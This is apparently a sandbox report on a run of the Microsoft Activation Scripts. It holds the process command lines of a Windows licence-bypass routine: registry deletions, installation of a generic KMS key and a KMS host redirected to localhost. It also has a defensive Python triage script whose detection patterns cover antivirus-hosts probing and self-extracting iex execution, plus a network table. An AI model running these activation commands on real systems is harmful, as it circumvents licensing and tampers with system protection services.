C:\Windows\System32\cmd.exe /S /D /c" echo "
C:\Windows\System32\find.exe
find /i "Ready"
C:\Windows\System32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "actionlist" /f
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$acl = (Get-Acl 'C:\Windows\System32\spp\store\2.0' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow FullControl') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$acl = (Get-Acl 'HKLM:\SYSTEM\WPA' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow QueryValues, EnumerateSubKeys, WriteKey') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$acl = (Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow SetValue') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$netServ = (New-Object Security.Principal.SecurityIdentifier('S-1-5-20')).Translate([Security.Principal.NTAccount]).Value; $aclString = Get-Acl 'Registry::HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies' | Format-List | Out-String; if (-not ($aclString.Contains($netServ + ' Allow FullControl') -or $aclString.Contains('NT SERVICE\sppsvc Allow FullControl')) -or ($aclString.Contains('Deny'))) {Exit 3}"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "040fa323-92b1-4baf-97a2-5b67feaefddb 0724cb7d-3437-4cb7-93cb-830375d0079d 0ad2ac98-7bb9-4201-8d92-312299201369 1a9a717a-cf13-4ba5-83c3-0fe25fa868d5 221a02da-e2a1-4b75-864c-0a4410a33fdf 291ece0e-9c38-40ca-a9e1-32cc7ec19507 2936d1d2-913a-4542-b54e-ce5a602a2a38 2c293c26-a45a-4a2a-a350-c69a67097529 2de67392-b7a7-462a-b1ca-108dd189f588 2ffd8952-423e-4903-b993-72a1aa44cf82 30a42c86-b7a0-4a34-8c90-ff177cb2acb7 345a5db0-d94f-4e3b-a0c0-7c42f7bc3ebf 3502365a-f88a-4ba4-822a-5769d3073b65 377333b1-8b5d-48d6-9679-1225c872d37c 3df374ef-d444-4494-a5a1-4b0d9fd0e203 3f1afc82-f8ac-4f6c-8005-1d233e606eee 49cd895b-53b2-4dc4-a5f7-b18aa019ad37 4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c 4f3da0d2-271d-4508-ae81-626b60809a38 5d78c4e9-aeb3-4b40-8ac2-6a6005e0ad6d 60b3ec1b-9545-4921-821f-311b129dd6f6 613d217f-7f13-4268-9907-1662339531cd 62f0c100-9c53-4e02-b886-a3528ddfe7f6 6365275e-368d-46ca-a0ef-fc0404119333 721f9237-9341-4453-a661-09e8baa6cca5 73111121-5638-40f6-bc11-f1d7b0d64300 7a802526-4c94-4bd1-ba14-835a1aca2120 7cb546c0-c7d5-44d8-9a5c-69ecdd782b69 82bbc092-bc50-4e16-8e18-b74fc486aec3 8ab9bdd1-1f67-4997-82d9-8878520837d9 8b351c9c-f398-4515-9900-09df49427262 90da7373-1c51-430b-bf26-c97e9c5cdc31 92fb8726-92a8-4ffc-94ce-f82e07444653 95dca82f-385d-4d39-b85b-5c73fa285d6f a48938aa-62fa-4966-9d44-9f04da3f72f2 b0773a15-df3a-4312-9ad2-83d69648e356 b4bfe195-541e-4e64-ad23-6177f19e395e b68e61d2-68ca-4757-be45-0cc2f3e68eee bd3762d7-270d-4760-8fb3-d829ca45278a c86d5194-4840-4dae-9c1c-0301003a5ab0 ca7df2e3-5ea0-47b8-9ac1-b1be4d8edd69 d552befb-48cc-4327-8f39-47d2d94f987c d6eadb3b-5ca8-4a6b-986e-35b550756111 df96023b-dcd9-4be2-afa0-c6c871159ebe e0c42288-980c-4788-a014-c080d2e1926e e4db50ea-bda1-4566-b047-0ca50abc6f07 e558417a-5123-4f6f-91e7-385c1c7ca9d4 e7a950a2-e548-4f10-bf16-02ec848e0643 eb6d346f-1c60-4643-b960-40ec31596c45 ec868e65-fadf-4759-b23e-93fe37f2cc29 ef51e000-2659-4f25-8345-3de70a9cf4c4 f7af7d09-40e4-419c-a49b-eae366689ebd fa755fe6-6739-40b9-8d84-6d0ea3b6d1ab fe74f55b-0338-41d6-b267-4a201abe7285" "
C:\Windows\System32\find.exe
find /i "2de67392-b7a7-462a-b1ca-108dd189f588"
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="W269N-WFGWX-YVC9B-4J6C9-T83GX"
C:\Windows\System32\cmd.exe
cmd /c exit /b 0
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call RefreshLicenseStatus
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE
C:\Windows\System32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
C:\Windows\System32\reg.exe
reg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"
C:\Windows\System32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServiceName /t REG_SZ /d "127.0.0.2"
C:\Windows\System32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServicePort /t REG_SZ /d "1688"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\sc.exe
sc query sppsvc
C:\Windows\System32\find.exe
find /i "STOPPED"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Job { Restart-Service ClipSVC } | Wait-Job -Timeout 20 | Out-Null"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\Clipup.exe
"C:\Windows\system32\Clipup.exe" -o
C:\Windows\system32\Clipup.exe
"C:\Windows\system32\Clipup.exe" -o -ppl C:\Windows\SystemTemp\tem4A0E.tmp
C:\Windows\System32\ClipUp.exe
clipup -v -o
C:\Windows\System32\clipup.exe
clipup -v -o -ppl C:\Users\Admin\AppData\Local\Temp\tem4AE9.tmp
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "Windows 11 Pro" "
C:\Windows\System32\find.exe
find /i "Windows"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powershell.exe "$([DateTime]::Now.addMinutes(6933338)).ToString('yyyy-MM-dd HH:mm:ss')" 2>nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$([DateTime]::Now.addMinutes(6933338)).ToString('yyyy-MM-dd HH:mm:ss')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':regdel\:.*';& ([ScriptBlock]::Create($f[1])) -protect"
C:\Windows\System32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"
C:\Windows\System32\reg.exe
reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "State" /f
C:\Windows\System32\reg.exe
reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "SuppressRulesEngine" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null; $TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('SLpTriggerServiceWorker', 'sppc.dll', 22, 1, [Int32], @([UInt32], [IntPtr], [String], [UInt32]), 1, 3); [void]$TB.CreateType()::SLpTriggerServiceWorker(0, 0, 'reeval', 0)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl,,0
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\Baif oc -efjie.pptx" /ou ""
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" RenamePC
C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\Baif oc -efjie.pptx" /ou ""
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
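The command lines above are the activation routine of the MAS_AIO.cmd script run from Downloads (Microsoft-Activation-Scripts-master) rather than the downloader named in the report header, and they contain several things a responder would want flagged automatically: PowerShell building P/Invoke stubs at runtime (winbrand.dll BrandingFormatString to read the edition name, sppc.dll SLpTriggerServiceWorker called with 'reeval' to force a licence re-evaluation), find.exe probing the hosts file for antivirus vendor domains, the .cmd file re-read with ReadAllText and split at a label so that one section can be fed to iex, deletion of SoftwareProtectionPlatform registry keys, installation of the generic KMS client setup key W269N-WFGWX-YVC9B-4J6C9-T83GX through SoftwareLicensingService, and the KMS host override to 127.0.0.2:1688. The Python below is an added triage example, not part of the sandbox report and not MAS code. It parses a listing in the report's alternating image-path / command-line format and runs a rule set over it. The sample listing embedded in it is a constructed excerpt of the command lines shown above (the MAS_AIO.cmd path is shortened), and the rule names and patterns are our own assumptions about what matters for triage, not sandbox signatures.

```python
"""Triage helper for a sandbox process listing in the format used above:
an image-path line followed by the command line that ran. Added example,
not part of the sandbox report and not MAS code; the rules are our own."""
import re
from collections import defaultdict

# Constructed excerpt of command lines from the listing above (the MAS_AIO.cmd
# path is shortened), alternating image path / command line as on the page.
SAMPLE = r"""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
C:\Windows\System32\sc.exe
sc start sppsvc
C:\Windows\System32\find.exe
find /i "avira.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':wpatest\:.*';iex ($f[1])"
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="W269N-WFGWX-YVC9B-4J6C9-T83GX"
C:\Windows\System32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
C:\Windows\System32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServiceName /t REG_SZ /d "127.0.0.2"
C:\Windows\System32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServicePort /t REG_SZ /d "1688"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null; $TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('SLpTriggerServiceWorker', 'sppc.dll', 22, 1, [Int32], @([UInt32], [IntPtr], [String], [UInt32]), 1, 3); [void]$TB.CreateType()::SLpTriggerServiceWorker(0, 0, 'reeval', 0)"
"""

# Rule name -> pattern run case-insensitively over each command line. Capture
# groups pull out the detail worth reporting: export and DLL of a runtime
# P/Invoke stub, vendor domain probed in the hosts file, KMS host/port, key.
RULE_PATTERNS = {
    "dynamic_pinvoke": r"DefinePInvokeMethod\(\s*'([^']+)'\s*,\s*'([^']+)'",
    "script_self_extract_iex": (r"ReadAllText\('([^']+)'\)\s*-split\s*'([^']*)'\s*;\s*"
                                r"(?:iex|&\s*\(\[ScriptBlock\]::Create)"),
    "hosts_file_av_check": r'find\s+/i\s+"([^"]+)"\s+\S*drivers\\etc\\hosts',
    "spp_registry_delete": r'reg\s+delete\s+"(HK[^"]*SoftwareProtectionPlatform[^"]*)"',
    "kms_host_override": r'/v\s+KeyManagementService(Name|Port)\s+/t\s+REG_SZ\s+/d\s+"([^"]+)"',
    "kms_client_key_install": r'InstallProductKey\s+ProductKey="([A-Z0-9]{5}(?:-[A-Z0-9]{5}){4})"',
    "spp_reeval_trigger": r"SLpTriggerServiceWorker\(([^)]*)\)",
    "service_control": r"^sc\s+(start|query|stop)\s+(\S+)",
}
RULES = {name: re.compile(rx, re.I) for name, rx in RULE_PATTERNS.items()}


def parse_listing(text):
    """Pair each image-path line with the command line on the next line."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("listing must alternate image path / command line")
    return list(zip(lines[0::2], lines[1::2]))


def triage(procs):
    """Run every rule over every command line; return {rule: [capture tuples]}."""
    hits = defaultdict(list)
    for _image, cmdline in procs:
        for name, rx in RULES.items():
            for m in rx.finditer(cmdline):
                hits[name].append(m.groups())
    return dict(hits)


def summarise(hits):
    """Condense the hits into the one-line notes a responder reads first."""
    notes = []
    dlls = sorted({dll for _export, dll in hits.get("dynamic_pinvoke", [])})
    if dlls:
        notes.append("PowerShell builds P/Invoke stubs at runtime into: " + ", ".join(dlls))
    domains = [d for (d,) in hits.get("hosts_file_av_check", [])]
    if domains:
        notes.append("hosts file probed for vendor domains: " + ", ".join(domains))
    for path, label in hits.get("script_self_extract_iex", []):
        notes.append(f"script re-reads {path}, splits at {label!r} and pipes a section to iex")
    for (key,) in hits.get("kms_client_key_install", []):
        notes.append("product key installed via SoftwareLicensingService: " + key)
    kms = dict(hits.get("kms_host_override", []))  # {'Name': host, 'Port': port}
    if kms:
        notes.append(f"KMS client pointed at {kms.get('Name', '?')}:{kms.get('Port', '?')}")
    if hits.get("spp_registry_delete"):
        notes.append(f"{len(hits['spp_registry_delete'])} SoftwareProtectionPlatform key deletion(s)")
    if hits.get("spp_reeval_trigger"):
        notes.append("licence re-evaluation forced through sppc.dll SLpTriggerServiceWorker")
    return notes


if __name__ == "__main__":
    found = triage(parse_listing(SAMPLE))
    for rule, matches in found.items():
        print(f"{rule}: {len(matches)} hit(s)")
    for note in summarise(found):
        print(" -", note)
```

Feeding the script the full process listing from a report instead of the excerpt only requires that the listing keep the strict image-path / command-line alternation; a listing with orphan lines trips the length check in parse_listing rather than silently pairing the wrong lines.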
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.144:443 | www.bing.com | tcp |
| GB | 95.101.143.34:443 | | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| US | 20.42.72.131:443 | browser.pipe.aria.microsoft.com | tcp |
| GB | 92.123.128.191:443 | www.bing.com | tcp |
| CH | 20.199.196.24:443 | 408c71c6b4182bc0e7b6dad6a1f85971.clo.footprintdns.com | tcp |
| US | 52.234.227.128:443 | ebe333a53a8b08e1a295fe7a35ef249e.azr.footprintdns.com | tcp |
| FR | 152.199.21.118:443 | static-ecst.licdn.com | tcp |
| US | 150.171.74.254:443 | bx-ring.msedge.net | tcp |
| US | 13.107.246.65:443 | fp-afd-nocache-ccp.azureedge.net | tcp |
| US | 172.202.65.254:443 | arc-ring.msedge.net | tcp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.149:443 | www.bing.com | tcp |
| US | 20.141.12.34:443 | fp-afd.azureedge.us | tcp |
| US | 20.141.12.34:443 | fp-afd.azureedge.us | tcp |
| US | 13.107.219.254:443 | t-ring-fallbacks1.msedge.net | tcp |
| CH | 20.203.193.248:443 | zrh20prdapp01-canary-opaph.netmon.azure.com | tcp |
| US | 13.107.246.65:443 | fp-afd-nocache-ccp.azureedge.net | tcp |
| FR | 52.98.163.34:443 | 894bc0c64677eddd0509476ce7bb433c.nrb.footprintdns.com | tcp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| GB | 2.18.63.31:443 | metadata.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 144.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.117.19.2.in-addr.arpa | udp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| GB | 95.101.143.34:443 | | tcp |
| US | 4.150.240.254:443 | arm-ring.msedge.net | tcp |
| US | 20.141.12.34:443 | fp-afd.azureedge.us | tcp |
| US | 52.108.9.254:443 | wac-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | mcr-ring.msedge.net | udp |
| US | 150.171.69.254:443 | mcr-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | 254.69.171.150.in-addr.arpa | udp |
| GB | 92.123.128.180:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.148:443 | www.bing.com | tcp |
| GB | 92.123.128.148:443 | www.bing.com | tcp |
| GB | 92.123.128.178:443 | www.bing.com | tcp |
| GB | 92.123.128.178:443 | www.bing.com | tcp |
| GB | 2.19.117.148:443 | aefd.nelreports.net | tcp |
| GB | 92.123.128.178:443 | www.bing.com | tcp |
| US | 13.107.21.200:443 | bing.com | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 104.21.10.247:443 | getgreenshot.org | tcp |
| US | 104.21.10.247:443 | getgreenshot.org | tcp |
| US | 8.8.8.8:53 | consent.cookiebot.com | udp |
| GB | 95.100.104.20:443 | consent.cookiebot.com | tcp |
| GB | 23.218.75.88:443 | consentcdn.cookiebot.com | tcp |
| GB | 23.218.75.88:443 | consentcdn.cookiebot.com | tcp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | tcp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | udp |
| US | 8.8.8.8:53 | 20.104.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.75.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.16.217.172.in-addr.arpa | udp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | tcp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| US | 104.21.10.247:80 | getgreenshot.org | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 95.101.143.34:443 | | tcp |
| IE | 20.123.29.87:443 | 3ca286e5e5eb4aed42c415698015e279.azr.footprintdns.com | tcp |
| US | 150.171.69.254:443 | mcr-ring.msedge.net | tcp |
| US | 150.171.74.254:443 | bx-ring.msedge.net | tcp |
| IE | 20.123.29.87:443 | 3ca286e5e5eb4aed42c415698015e279.azr.footprintdns.com | tcp |
| US | 13.107.138.254:443 | spo-ring.msedge.net | tcp |
| US | 104.21.10.247:80 | getgreenshot.org | tcp |
| US | 104.21.10.247:80 | getgreenshot.org | tcp |
| US | 104.21.10.247:443 | getgreenshot.org | tcp |
| US | 192.0.77.2:443 | i1.wp.com | tcp |
| SE | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| SE | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | udp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | tcp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | tcp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.67:443 | p4-gep5dc33nwvie-z3fpwuqpfem556nh-if-v6exp3-v4.metric.gstatic.com | tcp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 216.58.204.67:443 | p4-gep5dc33nwvie-z3fpwuqpfem556nh-if-v6exp3-v4.metric.gstatic.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| JP | 172.217.26.227:443 | csi.gstatic.com | tcp |
